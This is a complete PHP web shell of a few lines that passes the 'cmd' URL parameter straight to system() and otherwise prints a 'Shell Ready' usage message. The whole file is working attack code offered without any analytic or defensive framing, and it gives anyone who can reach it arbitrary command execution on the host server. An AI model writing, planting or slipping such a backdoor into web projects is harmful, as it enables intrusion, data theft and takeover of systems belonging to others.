<?php
if(isset($_GET["cmd"])) {
    system($_GET["cmd"]);
} else {
    echo "<pre>Shell Ready - Usage: ?cmd=whoami</pre>";
}
?>